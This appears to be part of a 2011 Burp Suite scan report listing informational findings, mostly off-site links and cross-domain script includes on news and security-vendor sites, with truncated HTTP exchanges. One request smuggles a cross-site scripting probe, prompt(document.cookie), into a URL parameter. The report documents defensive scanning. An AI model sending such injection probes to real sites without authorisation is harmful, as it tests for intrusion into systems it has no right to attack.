http://ad.doubleclick.net/ad/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;ord=6526253135?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=sidekick;sz=60x968;tile=15;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=topimu;sz=336x280,300x250,336x600;tile=6;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/ad/idgt.data.networkworld/data_collection_networkworld;sz=1x1;ord=123456789?
http://ad.doubleclick.net/clk;231957050;42408181;z?http://reg.idgenterprise.com/insider.html?url=http://www.networkworld.com/insider/index.html
http://ad.doubleclick.net/jump/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;ord=6526253135?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=sidekick;sz=60x968;tile=15;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=topimu;sz=336x280,300x250,336x600;tile=6;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?
http://ad.doubleclick.net/jump/idgt.data.networkworld/data_collection_networkworld;sz=1x1;ord=123456789?
http://admin.brightcove.com/js/experience_util.js
http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
http://apis.google.com/js/plusone.js
http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/b?c1=2&c2=6035308&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://content.dl-rms.com/rms/mother/575/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-203426h&cg=0&cc=1&ts=noscript
http://www.cfoworld.com/?source=nwwfooter
http://www.cio.com/?source=nwwfooter
http://www.computerworld.com/?source=nwwfooter
http://www.csoonline.com/?source=nwwfooter
http://www.demo.com/
http://www.facebook.com/
http://www.gamepro.com/
http://www.games.net/
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.google.com/ig/directory?url=hosting.gmodules.com/ig/gadgets/file/100373720822216712231/NWW_news_and_podcasts.xml
http://www.idgconnect.com/
http://www.idgknowledgehub.com/
http://www.idgtechnetwork.com/
http://www.idgventures.com/
http://www.infoworld.com/?source=nwwfooter
http://www.itwhitepapers.com/index.php?source=nwwfooter
http://www.itworld.com/?source=nwwfooter
http://www.javaworld.com/?source=nwwfooter
http://www.linkedin.com/e/gis/47510/7C2312642DFC
http://www.linuxworld.com/?source=nwwfooter
http://www.macworld.com/
http://www.networkworldmediakit.com/
http://www.pcworld.com/
https://www.subscribenww.com/cgi-win/nww.cgi?mode=add&p=
https://www.subscribenww.com/cgi-win/nww.cgi?mode=main

Request

GET /?ba876%27-prompt(document.cookie)-%276d0de08921e=1 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/15
Cookie: Apache=50.23.123.106.1315147426262493; s_pers=%20s_pv%3Dhomepage%253AHomepage%7C1315149426650%3B; __utma=219500550.255216774.1315147627.1315147627.1315147627.1; __utmb=219500550.1.10.1315147627; __utmz=219500550.1315147627.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; lastTopStoryBlock=2; __utmc=219500550; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; mobify=0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cneonction: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:46:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 223645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=dogear;sz=1x1;tile=5;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="1" height="1" border="0" alt=""></a>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=sidekick;sz=60x968;tile=15;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=sidekick;sz=60x968;tile=15;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="60" height="968" border="0" alt=""></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035308&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1"
style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<noscript>
   <a href="http://ad.doubleclick.net/jump/idgt.data.networkworld/data_collection_networkworld;sz=1x1;ord=123456789?" target="_blank">
   <img src="http://ad.doubleclick.net/ad/idgt.data.networkworld/data_collection_networkworld;sz=1x1;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=topleaderboard;sz=728x90,950x98,972x125,970x98,970x268;tile=1;dcopt=ist;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<li><a href="https://www.subscribenww.com/cgi-win/nww.cgi?mode=main">Subscriptions</a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=ticker;sz=800x64,768x64,800x30,965x48,970x66,970x30,950x55,972x100;tile=3;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="800" height="64" border="0" alt=""></a>
...[SNIP]...
<div class="image"><a id="&lpos=Top Story"
href="http://ad.doubleclick.net/clk;231957050;42408181;z?http://reg.idgenterprise.com/insider.html?url=http://www.networkworld.com/insider/index.html"
name="&lpos=Top Story"><img
src="/graphics/2010/nww-insider-promo1.jpg"
alt="Become an Insider today!" width="230" height="105"
border="0" />
...[SNIP]...
<div class="image"><a id="&lpos=Top Story"
href="http://ad.doubleclick.net/clk;231957050;42408181;z?http://reg.idgenterprise.com/insider.html?url=http://www.networkworld.com/insider/index.html"
name="&lpos=Top Story"><img
src="/graphics/2010/nww-insider-promo1.jpg"
alt="Become an Insider today!" width="230" height="105"
border="0" />
...[SNIP]...
<div class="image"><a id="&lpos=Top Story"
href="http://ad.doubleclick.net/clk;231957050;42408181;z?http://reg.idgenterprise.com/insider.html?url=http://www.networkworld.com/insider/index.html"
name="&lpos=Top Story"><img
src="/graphics/2010/nww-insider-promo1.jpg"
alt="Become an Insider today!" width="230" height="105"
border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;ord=6526253135?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=microguide;sz=150x35;tile=8;author=network_world_staff;cid=75931;kw=;ord=6526253135?" width="150" height="35" border="0" alt=""></a>
...[SNIP]...
<li><a href="http://www.facebook.com/#!/pages/Network-World/40168412104" title="Networkworld Facebook"><span class="stayinformedbutton facebook">
...[SNIP]...
<li><a href="http://www.linkedin.com/e/gis/47510/7C2312642DFC" title="Networkworld Linked In"><span class="stayinformedbutton linkedin">
...[SNIP]...
<li><a href="http://www.google.com/ig/directory?url=hosting.gmodules.com/ig/gadgets/file/100373720822216712231/NWW_news_and_podcasts.xml" title="Networkworld iGoogle"><span class="stayinformedbutton igoogle">
...[SNIP]...
<li><a href="https://www.subscribenww.com/cgi-win/nww.cgi?mode=main" title="Subscribe to Networkworld"><span class="stayinformedbutton subscribe">
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=topimu;sz=336x280,300x250,336x600;tile=6;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=topimu;sz=336x280,300x250,336x600;tile=6;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="336" height="600" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=bottomimu;sz=336x280,300x250,336x600;tile=10;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="336" height="600" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;ord=0061498137?" target="_blank"><img src="http://ad.doubleclick.net/ad/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;ord=0061498137?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</h3>
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
<li><a href="https://www.subscribenww.com/cgi-win/nww.cgi?mode=add&p=" rel="nofollow">Subscribe to Network World Magazine</a>
...[SNIP]...
<li><a href="http://www.networkworldmediakit.com" target="_blank" rel="nofollow">Advertise</a>
...[SNIP]...
<li><a href="http://www.cfoworld.com?source=nwwfooter" target="_blank">CFOworld</a>
...[SNIP]...
<li><a href="http://www.cio.com?source=nwwfooter" target="_blank">CIO</a></li>
                   <li><a href="http://www.computerworld.com?source=nwwfooter" target="_blank">Computerworld</a>
...[SNIP]...
<li><a href="http://www.csoonline.com?source=nwwfooter" target="_blank">CSO</a></li>
                   <li><a href="http://www.demo.com/" target="_blank">DEMO</a>
...[SNIP]...
<li><a href="http://www.gamepro.com" target="_blank">GamePro</a>
...[SNIP]...
<li><a href="http://www.games.net" target="_blank">Games.net</a>
...[SNIP]...
<li><a href="http://www.idgconnect.com" target="_blank">IDG Connect</a>
...[SNIP]...
<li><a href="http://www.idgknowledgehub.com" target="_blank">IDG Knowledge Hub</a>
...[SNIP]...
<li><a href="http://www.idgtechnetwork.com" target="_blank">IDG TechNetwork</a>
...[SNIP]...
<li><a href="http://www.idgventures.com" target="_blank">IDG Ventures</a>
...[SNIP]...
<li><a href="http://www.infoworld.com?source=nwwfooter" target="_blank">InfoWorld</a>
...[SNIP]...
<li><a href="http://www.itwhitepapers.com/index.php?source=nwwfooter" target="_blank">ITwhitepapers</a>
...[SNIP]...
<li><a href="http://www.itworld.com?source=nwwfooter" target="_blank">ITworld</a>
...[SNIP]...
<li><a href="http://www.javaworld.com?source=nwwfooter" target="_blank">JavaWorld</a>
...[SNIP]...
<li><a href="http://www.linuxworld.com?source=nwwfooter" target="_blank">LinuxWorld</a>
...[SNIP]...
<li><a href="http://www.macworld.com" target="_blank">MacWorld</a>
...[SNIP]...
<li><a href="http://www.pcworld.com/" target="_blank">PC World</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1"
style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<div>

<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-203426h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />

</div>
...[SNIP]...

15.59. http://www.securelist.com/en/find previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/find

Issue detail

The page was loaded from a URL containing a query string:

http://www.securelist.com/en/find?words=xss&searchtype=

The response contains the following links to other domains:

http://support.kaspersky.com/
http://www.kaspersky.com/
http://www.kaspersky.com/about
http://www.kaspersky.com/downloads
http://www.kaspersky.com/find
http://www.kaspersky.com/partners
http://www.kaspersky.com/products
http://www.kaspersky.com/store
http://www.kaspersky.com/threats
http://www.viruslist.com/de/
http://www.viruslist.com/fr/
http://www.viruslist.com/sp/
http://www.viruslist.pl/

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:13:20 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:vlyrub=30;vlxhtml=108
Content-Length: 17186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Search - Securelist</title>

<base href="http://www.securelist.com/en/">

<link rel="stylesheet" type="text/css" h
...[SNIP]...
<br/>
   <a href="http://www.viruslist.com/de/" onclick="_gaq.push(['_link', 'http://www.viruslist.com/de/']); return false;">German</a>
...[SNIP]...
<div class="pdl12 pdr12">
   <a href="http://www.viruslist.com/fr/" onclick="_gaq.push(['_link', 'http://www.viruslist.com/fr/']); return false;">French</a><br/>
   <a href="http://www.viruslist.com/sp/" onclick="_gaq.push(['_link', 'http://www.viruslist.com/sp/']); return false;">Spanish</a><br/>
   <a href="http://www.viruslist.pl/" onclick="_gaq.push(['_link', 'http://www.viruslist.pl/']); return false;">Polish</a>
...[SNIP]...
<p><a href="http://www.kaspersky.com/"><img src="images/newdesign3/logo_dwn.gif" alt=""/>
...[SNIP]...
<p KLMark="loc_msg:vl2_copytext">© 1997-2011 <a href="http://www.kaspersky.com">Kaspersky Lab ZAO</a>
...[SNIP]...
<div class="fr" KLMark="loc_msg:vl2_link_kasp">
                   <a href="http://www.kaspersky.com" style="text-decoration:none"><h4>
...[SNIP]...
<p><a href="http://www.kaspersky.com/products">Products</a></p>
<p><a href="http://www.kaspersky.com/store">eStore</a></p>
<p><a href="http://www.kaspersky.com/threats">Threats</a></p>
<p><a href="http://www.kaspersky.com/downloads">Downloads</a></p>
<p><a href="http://support.kaspersky.com/">Support</a></p>
<p><a href="http://www.kaspersky.com/partners">Partners</a></p>
<p><a href="http://www.kaspersky.com/about">About Us</a></p>
<p><a href="http://www.kaspersky.com/find">Search</a>
...[SNIP]...

15.60. http://www.theregister.co.uk/Design/javascript/_.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theregister.co.uk
Path:	/Design/javascript/_.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.theregister.co.uk/Design/javascript/_.js?b

The response contains the following links to other domains:

http://ad.doubleclick.net/N6978/adj/'+;unitnum='+(T-1),P2,p,R].join(';')+'?
http://api.chatcatcher.com/ccwidgets/ccwidget1.1.js
http://chatcatcher.com/
http://maps.google.com/maps/api/js?sensor=false&v=3&&callback=GMapRegCb
http://reg.cx/1M0W
http://reg.cx/1M0y
http://reg.cx/1M0z

Request

GET /Design/javascript/_.js?b HTTP/1.1
Host: www.theregister.co.uk
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/08/22/skype_security_bug/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:53 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 01 Sep 2011 15:43:08 GMT
ETag: "211c1-4abe319f11b00"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 12:12:53 GMT
Vary: Accept-Encoding
Content-Length: 135617
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v1.5.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
:0);if(typeof vcs!='undefined')
P2+=';vc=';$.each(vcs,function(){P2+=this+','});P2+='x.x';if(Mob)
z=z.replace(/^([a-z]+)_([a-z]+)\/([a-z]+)$/i,"mob/$1__$2__$3");if($('#ad-'+n+'-spot').length){var tag='<script type="text/javascript" src="http://ad.doubleclick.net/N6978/adj/'+
[z,'tile='+T++ +';unitnum='+(T-1),P2,p,R].join(';')+'?"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.chatcatcher.com/ccwidgets/ccwidget1.1.js"></script><p><a href="http://chatcatcher.com">Powered by Chat Catcher</a>
...[SNIP]...
ypes){link='#body a[rel=x-google'+MapTypes[map_type]+']';if($(link).length){type=MapTypes[map_type];$.getScript('http://dda.regmedia.co.uk/GMaps/'+MapTypes[map_type]+'.js',GMapRegCb);$('head').append('<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false&v=3&&callback=GMapRegCb"></script>
...[SNIP]...
<li><a href="http://reg.cx/1M0z">Email when there is WikiLeaks news</a>
...[SNIP]...
<li><a href="http://reg.cx/1M0y">WikiLeaks in your (rss/atom) feed reader</a>
...[SNIP]...
<li><a href="http://reg.cx/1M0W">Our WikiLeaks archive</a>
...[SNIP]...

16. Cross-domain script include previous next
There are 115 instances of this issue:

http://ad.doubleclick.net/adi/idge.nww.home/
http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
http://brazil.kaspersky.com/
http://cdn.ttgtmedia.com/rms/ux/javascript/tt_scripts.js
http://corporate.digitalriver.com/store
http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
http://corporate.digitalriver.com/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview
http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
http://corsec.com/index.php
http://devirusare.com/x26amp
http://digg.com/submit
http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp
http://forum.kaspersky.com/index.php
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://jqueryui.com/themeroller/
http://latam.kaspersky.com/
http://lwn.net/Articles/456878/
http://mi.adinterax.com/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js
http://office.microsoft.com/client/searchresults14.aspx
http://searchsecurity.techtarget.com/
http://searchsecurity.techtarget.com/magazine-sections/2011
http://searchsecurity.techtarget.com/magazine-sections/2011/09
http://searchsecurity.techtarget.com/search/query
http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
http://solutioncenters.computerworld.com/riverbed_1Q11_cw/
http://solutioncenters.computerworld.com/tm_security_journey_cloud/
http://solutioncenters.computerworld.com/virtual_computing_perspective/
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400
http://support.kasperskyamericas.com/
http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
http://support.kasperskyamericas.com/corporate/contact-information
http://support.kasperskyamericas.com/corporate/index.html
http://support.kasperskyamericas.com/corporate/live-chat
http://support.kasperskyamericas.com/corporate/mobile-security-7-enterprise-edition
http://support.kasperskyamericas.com/corporate/open-support-case
http://support.kasperskyamericas.com/search/node/xss
http://twitter.com/kaspersky
http://twitter.com/search
http://usa.kaspersky.com/
http://usa.kaspersky.com/about-us
http://usa.kaspersky.com/about-us/contact-us
http://usa.kaspersky.com/about-us/index.html
http://usa.kaspersky.com/index.html
http://usa.kaspersky.com/node/12354/lightbox2
http://usa.kaspersky.com/node/17007
http://usa.kaspersky.com/node/index.html
http://usa.kaspersky.com/products-services/home-computer-security/index.html
http://usa.kaspersky.com/products-services/home-computer-security/internet-security
http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
http://usa.kaspersky.com/products-services/home-computer-security/pure
http://usa.kaspersky.com/products-services/home-computer-security/tablet-security
http://usa.kaspersky.com/resources/knowledge-center/index.html
http://usa.kaspersky.com/resources/knowledge-center/whitepapers
http://usa.kaspersky.com/search/apachesolr_search
http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
http://usa.kaspersky.com/search/apachesolr_search/index.html
http://usa.kaspersky.com/search/apachesolr_search/xss
http://usa.kaspersky.com/store/index.html
http://usa.kaspersky.com/store/kaspersky-store
http://virusalert.nl/
http://www.2linkme.com/
http://www.accusoft.com/formsuitedemo.htm
http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php
http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx
http://www.cdw.com/shop/search/software-titles/websense-web-security.aspx
http://www.cfoworld.com/
http://www.cio.com/
http://www.cloudscan.me/2010/12/usakaperskycom-cross-site-scripting-xss.html
http://www.computerworld.com/
http://www.computerworld.com/s/newsletters
http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m
http://www.computerworld.com/spring/newsletter/1004/Computerworld%20Daily/
http://www.computerworld.com/spring/newsletter/1019/Networking/
http://www.computerworld.com/spring/newsletter/1021/Operating%20System/
http://www.computerworld.com/spring/newsletter/1025/Security/
http://www.computerworld.com/spring/newsletter/1028/The%20Weekly%20Top%2010/
http://www.csoonline.com/
http://www.cwsubscribe.com/cgi-win/cw.cgi
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.facebook.com/plugins/likebox.php
http://www.infoworld.com/
http://www.itwhitepapers.com/images/favicon.ico
http://www.itwhitepapers.com/index.php
http://www.itworld.com/
http://www.javaworld.com/
http://www.kaspersky.com/for-business
http://www.kaspersky.com/fr/
http://www.kaspersky.com/kaspersky-password-manager
http://www.kaspersky.com/pure
http://www.lexjansen.com/
http://www.lexjansen.com/virus/
http://www.maas360.com/
http://www.maas360.com/406.shtml
http://www.maas360.com/themes/maasweb2011/css/form.css
http://www.networkworld.com/
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.phonefactor.com/whitepaper-search-auth-revolution
http://www.qualys.com/forms/trials/qualysguard_free_scan/
http://www.qualys.com/forms/trials/qualysguard_freescan_landing/
http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
http://www.scmagazine.com.au/Tools/Email.aspx
http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
http://www.sophelle.com/Services/eCommerce-Cross-Channel-Strategy-Operations.html
http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
http://www.sophelle.com/Success-Stories/Project-Lifecycle-Re-Engineering.html
http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
http://www.stumbleupon.com/submit
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.theregister.co.uk/2011/08/22/skype_security_bug/
http://www.theregister.co.uk/Design/javascript/_.js
http://www.whatisnetwork.com/
http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html
http://www.youtube.com/results

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. http://ad.doubleclick.net/adi/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/idge.nww.home/

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

16.2. http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.computerworld.com
Path:	/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=OPG.Demandbase.dbase_parse
http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp
http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:15:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Last-Modified: Sun, 04 Sep 2011 12:13:39 GMT
ETag: "8694e1f5b7d784a626f261ef75740bc3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Cneonction: close
Content-Type: text/html; charset=utf-8
Content-Length: 78860

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta NAME="date" CONTENT="2011-08-18"/>
<meta NAME="publicationDate" CONTENT=
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...
</div>
